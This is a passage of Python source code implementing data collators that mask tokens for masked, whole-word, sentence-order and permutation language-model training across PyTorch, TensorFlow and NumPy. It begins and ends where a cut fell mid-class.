pad_to_multiple_of: Optional[int] = None
tf_experimental_compile: bool = False
return_tensors: str = "pt"
def __post_init__(self):
if self.mlm and self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. "
"You should pass `mlm=False` to train on causal language modeling instead."
)
if self.tf_experimental_compile:
import tensorflow as tf
self.tf_mask_tokens = tf.function(self.tf_mask_tokens, jit_compile=True)
@staticmethod
def tf_bernoulli(shape, probability):
import tensorflow as tf
prob_matrix = tf.fill(shape, probability)
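        # prob_matrix - uniform(0, 1) >= 0 holds exactly when the uniform draw is <= probability,
        # i.e. each position is True independently with the given probability (a Bernoulli sample)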
return tf.cast(prob_matrix - tf.random.uniform(shape, 0, 1) >= 0, tf.bool)
def tf_mask_tokens(
self, inputs: Any, vocab_size, mask_token_id, special_tokens_mask: Optional[Any] = None
) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import tensorflow as tf
input_shape = tf.shape(inputs)
# 1 for a special token, 0 for a normal token in the special tokens mask
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
masked_indices = self.tf_bernoulli(input_shape, self.mlm_probability) & ~special_tokens_mask
# Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens
labels = tf.where(masked_indices, inputs, -100)
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = self.tf_bernoulli(input_shape, 0.8) & masked_indices
inputs = tf.where(indices_replaced, mask_token_id, inputs)
        # 10% of the time, we replace masked input tokens with a random word (a 0.5 draw over the
        # remaining 20% not already replaced, matching the torch and numpy implementations)
        indices_random = self.tf_bernoulli(input_shape, 0.5) & masked_indices & ~indices_replaced
random_words = tf.random.uniform(input_shape, maxval=vocab_size, dtype=tf.int64)
inputs = tf.where(indices_random, random_words, inputs)
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
import tensorflow as tf
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="tf", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _tf_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True)
for val in batch["input_ids"].numpy().tolist()
]
# Cannot directly create as bool
special_tokens_mask = tf.cast(tf.convert_to_tensor(special_tokens_mask, dtype=tf.int64), tf.bool)
else:
special_tokens_mask = tf.cast(special_tokens_mask, tf.bool)
batch["input_ids"], batch["labels"] = self.tf_mask_tokens(
tf.cast(batch["input_ids"], tf.int64),
special_tokens_mask=special_tokens_mask,
mask_token_id=self.tokenizer.mask_token_id,
vocab_size=len(self.tokenizer),
)
else:
labels = batch["input_ids"]
if self.tokenizer.pad_token_id is not None:
# Replace self.tokenizer.pad_token_id with -100
labels = tf.where(labels == self.tokenizer.pad_token_id, -100, labels)
else:
labels = tf.identity(labels) # Makes a copy, just in case
batch["labels"] = labels
return batch
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="pt", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _torch_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["labels"] = self.torch_mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = batch["input_ids"].clone()
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["labels"] = labels
return batch
def torch_mask_tokens(self, inputs: Any, special_tokens_mask: Optional[Any] = None) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import torch
labels = inputs.clone()
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
special_tokens_mask = torch.tensor(special_tokens_mask, dtype=torch.bool)
else:
special_tokens_mask = special_tokens_mask.bool()
probability_matrix.masked_fill_(special_tokens_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
labels[~masked_indices] = -100 # We only compute loss on masked tokens
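        # The 80/10/10 split below is conditional: 80% of masked positions become [MASK]; of the
        # remaining 20%, a 0.5 draw picks half (10% overall) for random replacement; the last 10%
        # keep their original token.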
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
import numpy as np
# Handle dict or lists with proper padding and conversion to tensor.
if isinstance(examples[0], Mapping):
batch = self.tokenizer.pad(examples, return_tensors="np", pad_to_multiple_of=self.pad_to_multiple_of)
else:
batch = {
"input_ids": _numpy_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
}
# If special token mask has been preprocessed, pop it from the dict.
special_tokens_mask = batch.pop("special_tokens_mask", None)
if self.mlm:
batch["input_ids"], batch["labels"] = self.numpy_mask_tokens(
batch["input_ids"], special_tokens_mask=special_tokens_mask
)
else:
labels = np.copy(batch["input_ids"])
if self.tokenizer.pad_token_id is not None:
labels[labels == self.tokenizer.pad_token_id] = -100
batch["labels"] = labels
return batch
def numpy_mask_tokens(self, inputs: Any, special_tokens_mask: Optional[Any] = None) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
"""
import numpy as np
labels = np.copy(inputs)
# We sample a few tokens in each sequence for MLM training (with probability `self.mlm_probability`)
probability_matrix = np.full(labels.shape, self.mlm_probability)
if special_tokens_mask is None:
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
            special_tokens_mask = np.array(special_tokens_mask, dtype=bool)
        else:
            special_tokens_mask = special_tokens_mask.astype(bool)
probability_matrix[special_tokens_mask] = 0
# Numpy doesn't have bernoulli, so we use a binomial with 1 trial
        masked_indices = np.random.binomial(1, probability_matrix, size=probability_matrix.shape).astype(bool)
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
        indices_replaced = np.random.binomial(1, 0.8, size=labels.shape).astype(bool) & masked_indices
inputs[indices_replaced] = self.tokenizer.mask_token_id
# 10% of the time, we replace masked input tokens with random word
        indices_random = (
            np.random.binomial(1, 0.5, size=labels.shape).astype(bool) & masked_indices & ~indices_replaced
        )
random_words = np.random.randint(
low=0, high=len(self.tokenizer), size=np.count_nonzero(indices_random), dtype=np.int64
)
inputs[indices_random] = random_words
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
@dataclass
class DataCollatorForWholeWordMask(DataCollatorForLanguageModeling):
"""
Data collator used for language modeling that masks entire words.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for masked language modeling
<Tip>
This collator relies on details of the implementation of subword tokenization by [`BertTokenizer`], specifically
that subword tokens are prefixed with *##*. For tokenizers that do not adhere to this scheme, this collator will
produce an output that is roughly equivalent to [`.DataCollatorForLanguageModeling`].
</Tip>"""
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _torch_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
            for token_id in tolist(e["input_ids"]):
                token = self.tokenizer._convert_id_to_token(token_id)
ref_tokens.append(token)
                # For Chinese tokens, we need extra info to mark sub-words, e.g. [喜,欢] -> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _torch_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.torch_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _tf_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
            for token_id in tolist(e["input_ids"]):
                token = self.tokenizer._convert_id_to_token(token_id)
ref_tokens.append(token)
                # For Chinese tokens, we need extra info to mark sub-words, e.g. [喜,欢] -> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _tf_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.tf_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _numpy_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
            for token_id in tolist(e["input_ids"]):
                token = self.tokenizer._convert_id_to_token(token_id)
ref_tokens.append(token)
                # For Chinese tokens, we need extra info to mark sub-words, e.g. [喜,欢] -> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _numpy_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.numpy_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def _whole_word_mask(self, input_tokens: List[str], max_predictions=512):
"""
Get 0/1 labels for masked tokens with whole word mask proxy
"""
if not isinstance(self.tokenizer, (BertTokenizer, BertTokenizerFast)):
warnings.warn(
"DataCollatorForWholeWordMask is only suitable for BertTokenizer-like tokenizers. "
"Please refer to the documentation for more information."
)
cand_indexes = []
for (i, token) in enumerate(input_tokens):
if token == "[CLS]" or token == "[SEP]":
continue
if len(cand_indexes) >= 1 and token.startswith("##"):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
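        # e.g. (illustrative) for input_tokens ["[CLS]", "un", "##believ", "##able", "[SEP]"] this loop
        # yields cand_indexes == [[1, 2, 3]], so all sub-tokens of one word are masked or kept as a unit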
random.shuffle(cand_indexes)
num_to_predict = min(max_predictions, max(1, int(round(len(input_tokens) * self.mlm_probability))))
masked_lms = []
covered_indexes = set()
for index_set in cand_indexes:
if len(masked_lms) >= num_to_predict:
break
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
masked_lms.append(index)
if len(covered_indexes) != len(masked_lms):
raise ValueError("Length of covered_indexes is not equal to length of masked_lms.")
mask_labels = [1 if i in covered_indexes else 0 for i in range(len(input_tokens))]
return mask_labels
def torch_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
        Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
        Passing 'mask_labels' means we use whole-word masking (wwm): indices are masked directly according to the
        provided reference.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = inputs.clone()
        # We sample a few tokens in each sequence for masked-LM training (with probability `self.mlm_probability`, which defaults to 0.15 as in BERT/RoBERTa)
probability_matrix = mask_labels
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
probability_matrix.masked_fill_(padding_mask, value=0.0)
masked_indices = probability_matrix.bool()
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def tf_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
        Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
        Passing 'mask_labels' means we use whole-word masking (wwm): indices are masked directly according to the
        provided reference.
"""
import tensorflow as tf
input_shape = tf.shape(inputs)
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = tf.identity(inputs)
        # We sample a few tokens in each sequence for masked-LM training (with probability `self.mlm_probability`, which defaults to 0.15 as in BERT/RoBERTa)
masked_indices = tf.cast(mask_labels, tf.bool)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels
]
masked_indices = masked_indices & ~tf.cast(special_tokens_mask, dtype=tf.bool)
if self.tokenizer._pad_token is not None:
padding_mask = inputs == self.tokenizer.pad_token_id
masked_indices = masked_indices & ~padding_mask
# Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens
labels = tf.where(masked_indices, inputs, -100)
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = self.tf_bernoulli(input_shape, 0.8) & masked_indices
inputs = tf.where(indices_replaced, self.tokenizer.mask_token_id, inputs)
        # 10% of the time, we replace masked input tokens with a random word (a 0.5 draw over the
        # remaining 20% not already replaced, matching the torch and numpy implementations)
        indices_random = self.tf_bernoulli(input_shape, 0.5) & masked_indices & ~indices_replaced
random_words = tf.random.uniform(input_shape, maxval=len(self.tokenizer), dtype=tf.int64)
inputs = tf.where(indices_random, random_words, inputs)
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def numpy_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
        Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original.
        Passing 'mask_labels' means we use whole-word masking (wwm): indices are masked directly according to the
        provided reference.
"""
import numpy as np
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = np.copy(inputs)
        # We sample a few tokens in each sequence for masked-LM training (with probability `self.mlm_probability`, which defaults to 0.15 as in BERT/RoBERTa)
        masked_indices = mask_labels.astype(bool)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
        masked_indices[np.array(special_tokens_mask, dtype=bool)] = 0
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices[padding_mask] = 0
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
        indices_replaced = np.random.binomial(1, 0.8, size=labels.shape).astype(bool) & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
        indices_random = (
            np.random.binomial(1, 0.5, size=labels.shape).astype(bool) & masked_indices & ~indices_replaced
        )
random_words = np.random.randint(low=0, high=len(self.tokenizer), size=labels.shape, dtype=np.int64)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
@dataclass
class DataCollatorForSOP(DataCollatorForLanguageModeling):
"""
Data collator used for sentence order prediction task.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for both masked language modeling and sentence order prediction
"""
    def __init__(self, *args, **kwargs):
        warnings.warn(
            "DataCollatorForSOP is deprecated and will be removed in a future version, you can now use "
            "DataCollatorForLanguageModeling instead.",
            FutureWarning,
        )
        super().__init__(*args, **kwargs)
def __call__(self, examples: List[Dict[str, Any]]) -> Dict[str, Any]:
import torch
from torch.nn.utils.rnn import pad_sequence
input_ids = [example["input_ids"] for example in examples]
input_ids = _torch_collate_batch(input_ids, self.tokenizer)
input_ids, labels, attention_mask = self.mask_tokens(input_ids)
token_type_ids = [example["token_type_ids"] for example in examples]
        # the size of segment_ids varies because of randomness; pad to the end, as in the original implementation
token_type_ids = pad_sequence(token_type_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id)
sop_label_list = [example["sentence_order_label"] for example in examples]
sentence_order_label = torch.stack(sop_label_list)
return {
"input_ids": input_ids,
"labels": labels,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"sentence_order_label": sentence_order_label,
}
def mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any]:
"""
Prepare masked tokens inputs/labels/attention_mask for masked language modeling: 80% MASK, 10% random, 10%
original. N-gram not applied yet.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = inputs.clone()
        # We sample a few tokens in each sequence for masked-LM training (with probability `self.mlm_probability`, which defaults to 0.15 as in BERT/RoBERTa)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
probability_matrix.masked_fill_(padding_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
        # in masked_indices a value of 1 means masked, but in the ALBERT attention mask 0 means masked,
        # so invert the values
attention_mask = (~masked_indices).float()
if self.tokenizer._pad_token is not None:
attention_padding_mask = labels.eq(self.tokenizer.pad_token_id)
attention_mask.masked_fill_(attention_padding_mask, value=1.0)
labels[~masked_indices] = -100 # We only compute loss on masked tokens, -100 is default for CE compute
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels, attention_mask
@dataclass
class DataCollatorForPermutationLanguageModeling(DataCollatorMixin):
"""
Data collator used for permutation language modeling.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for permutation language modeling with procedures specific to XLNet
"""
tokenizer: PreTrainedTokenizerBase
plm_probability: float = 1 / 6
max_span_length: int = 5 # maximum length of a span of masked tokens
return_tensors: str = "pt"
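    # A minimal usage sketch (not from the original docs; the model name is illustrative and the
    # tokenized sequences must have even length):
    #
    #   from transformers import AutoTokenizer
    #   tokenizer = AutoTokenizer.from_pretrained("xlnet-base-cased")
    #   collator = DataCollatorForPermutationLanguageModeling(tokenizer=tokenizer)
    #   batch = collator([{"input_ids": ids} for ids in even_length_id_lists])  # hypothetical variable
    #   # batch contains input_ids, perm_mask, target_mapping and labels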
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _torch_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.torch_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _tf_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.tf_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _numpy_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.numpy_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def torch_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if inputs.size(1) % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = inputs.clone()
# Creating the mask and target_mapping tensors
masked_indices = torch.full(labels.shape, 0, dtype=torch.bool)
target_mapping = torch.zeros((labels.size(0), labels.size(1), labels.size(1)), dtype=torch.float32)
for i in range(labels.size(0)):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = labels.size(1)
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = torch.randint(1, self.max_span_length + 1, (1,)).item()
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + torch.randint(context_length - span_length + 1, (1,)).item()
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
            # the i-th prediction corresponds to the i-th token.
target_mapping[i] = torch.eye(labels.size(1))
special_tokens_mask = torch.tensor(
[self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()],
dtype=torch.bool,
)
masked_indices.masked_fill_(special_tokens_mask, value=0.0)
        if self.tokenizer._pad_token is not None:
            padding_mask = labels.eq(self.tokenizer.pad_token_id)
            masked_indices.masked_fill_(padding_mask, value=0.0)
        else:
            # without a pad token there is nothing to mask out, but `padding_mask` is still needed below
            padding_mask = torch.zeros_like(labels, dtype=torch.bool)
        # Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
        non_func_mask = ~(padding_mask | special_tokens_mask)
inputs[masked_indices] = self.tokenizer.mask_token_id
labels[~masked_indices] = -100 # We only compute loss on masked tokens
perm_mask = torch.zeros((labels.size(0), labels.size(1), labels.size(1)), dtype=torch.float32)
for i in range(labels.size(0)):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
perm_index = torch.arange(labels.size(1))
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = perm_index.reshape((-1, labels.size(1) // 2)).transpose(0, 1)
# Permute the two halves such that they do not cross over
perm_index = perm_index[torch.randperm(labels.size(1) // 2)]
# Flatten this out into the desired permuted factorisation order
perm_index = torch.flatten(perm_index.transpose(0, 1))
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index.masked_fill_(~masked_indices[i] & non_func_mask[i], -1)
# The logic for whether the i-th token can attend on the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask[i] = (
perm_index.reshape((labels.size(1), 1)) <= perm_index.reshape((1, labels.size(1)))
) & masked_indices[i]
return inputs.long(), perm_mask, target_mapping, labels.long()
def tf_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
from random import randint
import numpy as np
import tensorflow as tf
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if tf.shape(inputs)[1] % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = tf.identity(inputs)
# Creating the mask and target_mapping tensors
        masked_indices = np.full(labels.shape.as_list(), 0, dtype=bool)
labels_shape = tf.shape(labels)
target_mapping = np.zeros((labels_shape[0], labels_shape[1], labels_shape[1]), dtype=np.float32)
for i in range(len(labels)):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = tf.shape(labels)[1]
while cur_len < max_len:
                # Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be
                # masked); note `random.randint` is inclusive on both ends, unlike `torch.randint`
                span_length = randint(1, self.max_span_length)
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
                # Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
                # span_length]` (inclusive, since `random.randint` includes both ends) and mask tokens
                # `start_index:start_index + span_length`
                start_index = cur_len + randint(0, context_length - span_length)
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
            # the i-th prediction corresponds to the i-th token.
target_mapping[i] = np.eye(labels_shape[1])
masked_indices = tf.cast(tf.convert_to_tensor(masked_indices), dtype=tf.bool)
target_mapping = tf.convert_to_tensor(target_mapping)
special_tokens_mask = tf.convert_to_tensor(
[
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True)
for val in labels.numpy().tolist()
],
)
special_tokens_mask = tf.cast(special_tokens_mask, dtype=tf.bool)
masked_indices = masked_indices & ~special_tokens_mask
        if self.tokenizer._pad_token is not None:
            padding_mask = labels == self.tokenizer.pad_token_id
            masked_indices = masked_indices & ~padding_mask
        else:
            # without a pad token there is nothing to mask out, but `padding_mask` is still needed below
            padding_mask = tf.zeros_like(labels, dtype=tf.bool)
